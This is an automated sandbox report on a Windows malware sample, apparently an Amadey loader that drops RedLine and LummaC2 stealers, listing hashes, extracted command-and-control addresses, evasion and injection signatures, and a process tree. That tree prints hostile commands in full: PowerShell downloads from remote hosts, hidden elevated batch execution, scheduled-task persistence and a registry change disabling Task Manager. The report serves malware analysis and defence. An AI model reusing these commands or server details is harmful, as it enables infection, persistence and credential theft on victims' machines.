Analysis
-
max time kernel
150s -
max time network
149s -
platform
windows11-21h2_x64 -
resource
win11-20240611-en -
resource tags
arch:x64arch:x86image:win11-20240611-enlocale:en-usos:windows11-21h2-x64system -
submitted
23-06-2024 18:50
Static task
static1
Behavioral task
behavioral1
Sample
9a3412ff28928d1c2178a090a989dfe961f7c8acfee179217814c98b55620446.exe
Resource
win10v2004-20240611-en
Behavioral task
behavioral2
Sample
9a3412ff28928d1c2178a090a989dfe961f7c8acfee179217814c98b55620446.exe
Resource
win11-20240611-en
General
-
Target
9a3412ff28928d1c2178a090a989dfe961f7c8acfee179217814c98b55620446.exe
-
Size
1.8MB
-
MD5
74567fb6c1a91b1fc4af041fd8d95a11
-
SHA1
1a248b15186b94f07c5e85fa771da48b1afa0bba
-
SHA256
9a3412ff28928d1c2178a090a989dfe961f7c8acfee179217814c98b55620446
-
SHA512
18028b2bfd4eda27a95507a1f407791bcb88d17f91ec9ea48a53f01141562ce4580b12345cb22ebb81a976b1ff63d8c379f65bf4b1cd0d7c0d332f159b3dec08
-
SSDEEP
49152:ywQZVyYSKDxTamqIhfrtlYYiqPx76vRI:YHSI1qIhztYqH
Malware Config
Extracted
amadey
8254624243
e76b71
http://77.91.77.81
-
install_dir
8254624243
-
install_file
axplong.exe
-
strings_key
90049e51fabf09df0d6748e0b271922e
-
url_paths
/Kiru9gu/index.php
Extracted
redline
AMA
185.215.113.67:40960
Extracted
redline
LiveTraffic
4.185.27.237:13528
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 3 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\1000007001\ama.exe family_redline behavioral2/memory/884-41-0x00000000002C0000-0x0000000000310000-memory.dmp family_redline behavioral2/memory/4224-66-0x0000000000400000-0x0000000000450000-memory.dmp family_redline -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs
Processes:
axplong.exe9a3412ff28928d1c2178a090a989dfe961f7c8acfee179217814c98b55620446.exeaxplong.exe7.exeaxplong.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 9a3412ff28928d1c2178a090a989dfe961f7c8acfee179217814c98b55620446.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 7.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ axplong.exe -
Blocklisted process makes network request 4 IoCs
Processes:
powershell.exepowershell.exeflow pid process 30 5028 powershell.exe 32 5028 powershell.exe 33 5040 powershell.exe 34 5040 powershell.exe -
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepid process 5028 powershell.exe 5040 powershell.exe 3156 powershell.exe 1420 powershell.exe -
Disables Task Manager via registry modification
-
Downloads MZ/PE file
-
Checks BIOS information in registry 2 TTPs 10 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
9a3412ff28928d1c2178a090a989dfe961f7c8acfee179217814c98b55620446.exeaxplong.exe7.exeaxplong.exeaxplong.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 9a3412ff28928d1c2178a090a989dfe961f7c8acfee179217814c98b55620446.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 9a3412ff28928d1c2178a090a989dfe961f7c8acfee179217814c98b55620446.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 7.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion axplong.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion axplong.exe -
Executes dropped EXE 16 IoCs
Processes:
axplong.exeama.exegold.exelummac2.exeNewLatest.exeHkbsse.exeInstaller.exelegs.exe1.exetaskweaker.exe6.exe7.exeHkbsse.exeaxplong.exeHkbsse.exeaxplong.exepid process 2080 axplong.exe 884 ama.exe 2068 gold.exe 3472 lummac2.exe 4984 NewLatest.exe 2224 Hkbsse.exe 5108 Installer.exe 4464 legs.exe 1424 1.exe 2660 taskweaker.exe 1556 6.exe 2284 7.exe 1988 Hkbsse.exe 2660 axplong.exe 3188 Hkbsse.exe 3892 axplong.exe -
Identifies Wine through registry keys 2 TTPs 5 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
axplong.exe9a3412ff28928d1c2178a090a989dfe961f7c8acfee179217814c98b55620446.exeaxplong.exe7.exeaxplong.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Wine 9a3412ff28928d1c2178a090a989dfe961f7c8acfee179217814c98b55620446.exe Key opened \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Wine axplong.exe Key opened \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Wine 7.exe Key opened \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000\Software\Wine axplong.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
Installer.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" Installer.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
Processes:
9a3412ff28928d1c2178a090a989dfe961f7c8acfee179217814c98b55620446.exeaxplong.exe7.exeaxplong.exeaxplong.exepid process 1920 9a3412ff28928d1c2178a090a989dfe961f7c8acfee179217814c98b55620446.exe 2080 axplong.exe 2284 7.exe 2660 axplong.exe 3892 axplong.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
gold.exelegs.exetaskweaker.exedescription pid process target process PID 2068 set thread context of 4224 2068 gold.exe RegAsm.exe PID 4464 set thread context of 1312 4464 legs.exe RegAsm.exe PID 2660 set thread context of 3592 2660 taskweaker.exe BitLockerToGo.exe -
Drops file in Windows directory 2 IoCs
Processes:
9a3412ff28928d1c2178a090a989dfe961f7c8acfee179217814c98b55620446.exeNewLatest.exedescription ioc process File created C:\Windows\Tasks\axplong.job 9a3412ff28928d1c2178a090a989dfe961f7c8acfee179217814c98b55620446.exe File created C:\Windows\Tasks\Hkbsse.job NewLatest.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 2 IoCs
Processes:
WerFault.exeWerFault.exepid pid_target process target process 4860 4464 WerFault.exe legs.exe 4944 1424 WerFault.exe 1.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
1.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 1.exe -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
msedge.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe -
Modifies registry class 1 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-423582142-4191893794-1888535462-1000_Classes\Local Settings powershell.exe -
Modifies registry key 1 TTPs 1 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 3420 schtasks.exe 4456 schtasks.exe 2876 schtasks.exe 1588 schtasks.exe 1016 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 37 IoCs
Processes:
9a3412ff28928d1c2178a090a989dfe961f7c8acfee179217814c98b55620446.exeaxplong.exepowershell.exepowershell.exepowershell.exeRegAsm.exeRegAsm.exeama.exe6.exe7.exemsedge.exemsedge.exepowershell.exeidentity_helper.exemsedge.exeaxplong.exeaxplong.exepid process 1920 9a3412ff28928d1c2178a090a989dfe961f7c8acfee179217814c98b55620446.exe 1920 9a3412ff28928d1c2178a090a989dfe961f7c8acfee179217814c98b55620446.exe 2080 axplong.exe 2080 axplong.exe 5028 powershell.exe 5028 powershell.exe 1420 powershell.exe 1420 powershell.exe 5040 powershell.exe 5040 powershell.exe 5040 powershell.exe 4224 RegAsm.exe 4224 RegAsm.exe 4224 RegAsm.exe 1312 RegAsm.exe 884 ama.exe 884 ama.exe 884 ama.exe 1556 6.exe 1556 6.exe 2284 7.exe 2284 7.exe 2352 msedge.exe 2352 msedge.exe 2688 msedge.exe 2688 msedge.exe 3156 powershell.exe 3156 powershell.exe 3156 powershell.exe 3444 identity_helper.exe 3444 identity_helper.exe 1880 msedge.exe 1880 msedge.exe 2660 axplong.exe 2660 axplong.exe 3892 axplong.exe 3892 axplong.exe -
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs
Processes:
msedge.exepid process 2688 msedge.exe 2688 msedge.exe 2688 msedge.exe 2688 msedge.exe 2688 msedge.exe 2688 msedge.exe -
Suspicious use of AdjustPrivilegeToken 12 IoCs
Processes:
powershell.exepowershell.exeRegAsm.exepowershell.exeRegAsm.exeama.exepowershell.exedescription pid process Token: SeDebugPrivilege 5028 powershell.exe Token: SeDebugPrivilege 1420 powershell.exe Token: SeDebugPrivilege 1312 RegAsm.exe Token: SeBackupPrivilege 1312 RegAsm.exe Token: SeSecurityPrivilege 1312 RegAsm.exe Token: SeSecurityPrivilege 1312 RegAsm.exe Token: SeSecurityPrivilege 1312 RegAsm.exe Token: SeSecurityPrivilege 1312 RegAsm.exe Token: SeDebugPrivilege 5040 powershell.exe Token: SeDebugPrivilege 4224 RegAsm.exe Token: SeDebugPrivilege 884 ama.exe Token: SeDebugPrivilege 3156 powershell.exe -
Suspicious use of FindShellTrayWindow 26 IoCs
Processes:
9a3412ff28928d1c2178a090a989dfe961f7c8acfee179217814c98b55620446.exemsedge.exepid process 1920 9a3412ff28928d1c2178a090a989dfe961f7c8acfee179217814c98b55620446.exe 2688 msedge.exe 2688 msedge.exe 2688 msedge.exe 2688 msedge.exe 2688 msedge.exe 2688 msedge.exe 2688 msedge.exe 2688 msedge.exe 2688 msedge.exe 2688 msedge.exe 2688 msedge.exe 2688 msedge.exe 2688 msedge.exe 2688 msedge.exe 2688 msedge.exe 2688 msedge.exe 2688 msedge.exe 2688 msedge.exe 2688 msedge.exe 2688 msedge.exe 2688 msedge.exe 2688 msedge.exe 2688 msedge.exe 2688 msedge.exe 2688 msedge.exe -
Suspicious use of SendNotifyMessage 12 IoCs
Processes:
msedge.exepid process 2688 msedge.exe 2688 msedge.exe 2688 msedge.exe 2688 msedge.exe 2688 msedge.exe 2688 msedge.exe 2688 msedge.exe 2688 msedge.exe 2688 msedge.exe 2688 msedge.exe 2688 msedge.exe 2688 msedge.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
9a3412ff28928d1c2178a090a989dfe961f7c8acfee179217814c98b55620446.exeaxplong.exegold.exeNewLatest.exeInstaller.execmd.exelegs.exeHkbsse.exepowershell.execmd.exedescription pid process target process PID 1920 wrote to memory of 2080 1920 9a3412ff28928d1c2178a090a989dfe961f7c8acfee179217814c98b55620446.exe axplong.exe PID 1920 wrote to memory of 2080 1920 9a3412ff28928d1c2178a090a989dfe961f7c8acfee179217814c98b55620446.exe axplong.exe PID 1920 wrote to memory of 2080 1920 9a3412ff28928d1c2178a090a989dfe961f7c8acfee179217814c98b55620446.exe axplong.exe PID 2080 wrote to memory of 884 2080 axplong.exe ama.exe PID 2080 wrote to memory of 884 2080 axplong.exe ama.exe PID 2080 wrote to memory of 884 2080 axplong.exe ama.exe PID 2080 wrote to memory of 2068 2080 axplong.exe gold.exe PID 2080 wrote to memory of 2068 2080 axplong.exe gold.exe PID 2080 wrote to memory of 2068 2080 axplong.exe gold.exe PID 2068 wrote to memory of 4224 2068 gold.exe RegAsm.exe PID 2068 wrote to memory of 4224 2068 gold.exe RegAsm.exe PID 2068 wrote to memory of 4224 2068 gold.exe RegAsm.exe PID 2068 wrote to memory of 4224 2068 gold.exe RegAsm.exe PID 2068 wrote to memory of 4224 2068 gold.exe RegAsm.exe PID 2068 wrote to memory of 4224 2068 gold.exe RegAsm.exe PID 2068 wrote to memory of 4224 2068 gold.exe RegAsm.exe PID 2068 wrote to memory of 4224 2068 gold.exe RegAsm.exe PID 2080 wrote to memory of 3472 2080 axplong.exe lummac2.exe PID 2080 wrote to memory of 3472 2080 axplong.exe lummac2.exe PID 2080 wrote to memory of 3472 2080 axplong.exe lummac2.exe PID 2080 wrote to memory of 4984 2080 axplong.exe NewLatest.exe PID 2080 wrote to memory of 4984 2080 axplong.exe NewLatest.exe PID 2080 wrote to memory of 4984 2080 axplong.exe NewLatest.exe PID 4984 wrote to memory of 2224 4984 NewLatest.exe Hkbsse.exe PID 4984 wrote to memory of 2224 4984 NewLatest.exe Hkbsse.exe PID 4984 wrote to memory of 2224 4984 NewLatest.exe Hkbsse.exe PID 2080 wrote to memory of 5108 2080 axplong.exe Installer.exe PID 2080 wrote to memory of 5108 2080 axplong.exe Installer.exe PID 5108 wrote to memory of 536 5108 Installer.exe cmd.exe PID 5108 wrote to memory of 536 5108 Installer.exe cmd.exe PID 536 wrote to memory of 2876 536 cmd.exe schtasks.exe PID 536 wrote to memory of 2876 536 cmd.exe schtasks.exe PID 536 wrote to memory of 1588 536 cmd.exe schtasks.exe PID 536 wrote to memory of 1588 536 cmd.exe schtasks.exe PID 536 wrote to memory of 5028 536 cmd.exe powershell.exe PID 536 wrote to memory of 5028 536 cmd.exe powershell.exe PID 2080 wrote to memory of 4464 2080 axplong.exe legs.exe PID 2080 wrote to memory of 4464 2080 axplong.exe legs.exe PID 2080 wrote to memory of 4464 2080 axplong.exe legs.exe PID 4464 wrote to memory of 1312 4464 legs.exe RegAsm.exe PID 4464 wrote to memory of 1312 4464 legs.exe RegAsm.exe PID 4464 wrote to memory of 1312 4464 legs.exe RegAsm.exe PID 4464 wrote to memory of 1312 4464 legs.exe RegAsm.exe PID 4464 wrote to memory of 1312 4464 legs.exe RegAsm.exe PID 4464 wrote to memory of 1312 4464 legs.exe RegAsm.exe PID 4464 wrote to memory of 1312 4464 legs.exe RegAsm.exe PID 4464 wrote to memory of 1312 4464 legs.exe RegAsm.exe PID 536 wrote to memory of 1420 536 cmd.exe powershell.exe PID 536 wrote to memory of 1420 536 cmd.exe powershell.exe PID 2224 wrote to memory of 1424 2224 Hkbsse.exe 1.exe PID 2224 wrote to memory of 1424 2224 Hkbsse.exe 1.exe PID 2224 wrote to memory of 1424 2224 Hkbsse.exe 1.exe PID 1420 wrote to memory of 2624 1420 powershell.exe cmd.exe PID 1420 wrote to memory of 2624 1420 powershell.exe cmd.exe PID 536 wrote to memory of 5040 536 cmd.exe powershell.exe PID 536 wrote to memory of 5040 536 cmd.exe powershell.exe PID 2624 wrote to memory of 1016 2624 cmd.exe schtasks.exe PID 2624 wrote to memory of 1016 2624 cmd.exe schtasks.exe PID 2624 wrote to memory of 3792 2624 cmd.exe reg.exe PID 2624 wrote to memory of 3792 2624 cmd.exe reg.exe PID 2624 wrote to memory of 3420 2624 cmd.exe schtasks.exe PID 2624 wrote to memory of 3420 2624 cmd.exe schtasks.exe PID 2624 wrote to memory of 4456 2624 cmd.exe schtasks.exe PID 2624 wrote to memory of 4456 2624 cmd.exe schtasks.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\9a3412ff28928d1c2178a090a989dfe961f7c8acfee179217814c98b55620446.exe"C:\Users\Admin\AppData\Local\Temp\9a3412ff28928d1c2178a090a989dfe961f7c8acfee179217814c98b55620446.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe"C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe"2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\1000007001\ama.exe"C:\Users\Admin\AppData\Local\Temp\1000007001\ama.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\6.exe"C:\Users\Admin\AppData\Local\Temp\6.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\7.exe"C:\Users\Admin\AppData\Local\Temp\7.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.co/1lLub4⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff0ded3cb8,0x7fff0ded3cc8,0x7fff0ded3cd85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1908,506981416837234588,12599170653189614310,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1904 /prefetch:25⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1908,506981416837234588,12599170653189614310,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2372 /prefetch:35⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1908,506981416837234588,12599170653189614310,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2772 /prefetch:85⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,506981416837234588,12599170653189614310,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,506981416837234588,12599170653189614310,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1908,506981416837234588,12599170653189614310,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5416 /prefetch:85⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1908,506981416837234588,12599170653189614310,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5420 /prefetch:85⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,506981416837234588,12599170653189614310,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4588 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,506981416837234588,12599170653189614310,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5420 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,506981416837234588,12599170653189614310,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5608 /prefetch:15⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1908,506981416837234588,12599170653189614310,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5636 /prefetch:15⤵
-
C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe"C:\Users\Admin\AppData\Local\Temp\1000035001\gold.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe"C:\Users\Admin\AppData\Local\Temp\1000047001\lummac2.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe"C:\Users\Admin\AppData\Local\Temp\1000064001\NewLatest.exe"3⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe"C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe"4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\1000014001\1.exe"C:\Users\Admin\AppData\Local\Temp\1000014001\1.exe"5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1424 -s 3846⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000091001\Installer.exe"C:\Users\Admin\AppData\Local\Temp\1000091001\Installer.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
-
C:\Windows\SYSTEM32\cmd.execmd /c ins.bat4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php"5⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /SC MINUTE /MO 11 /TN "Updater" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php"5⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/4c7L8Zs' -UseBasicParsing >$null"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Start-Process 'C:\Users\Admin\AppData\Local\Temp\install.bat' -Verb runAs -WindowStyle Hidden"5⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\install.bat"6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /create /tn "Cleaner" /tr "C:\Users\Admin\AppData\Local\Corporation\File\RemoteExecuteScriptSilent.exe" /sc onstart /delay 0005:007⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /f /v DisableTaskMgr /t REG_DWORD /d 000000017⤵
- Modifies registry key
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" /F7⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /SC MINUTE /MO 11 /TN "Updater" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" /F7⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Invoke-WebRequest -Uri 'https://github.com/frielandrews892/File/releases/download/File/File.zip' -OutFile 'C:\Users\Admin\AppData\Local\Corporation.zip'"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Expand-Archive -Path 'C:\Users\Admin\AppData\Local\Corporation.zip' -DestinationPath 'C:\Users\Admin\AppData\Local\Corporation'"5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exeschtasks /query /TN "Cleaner"5⤵
-
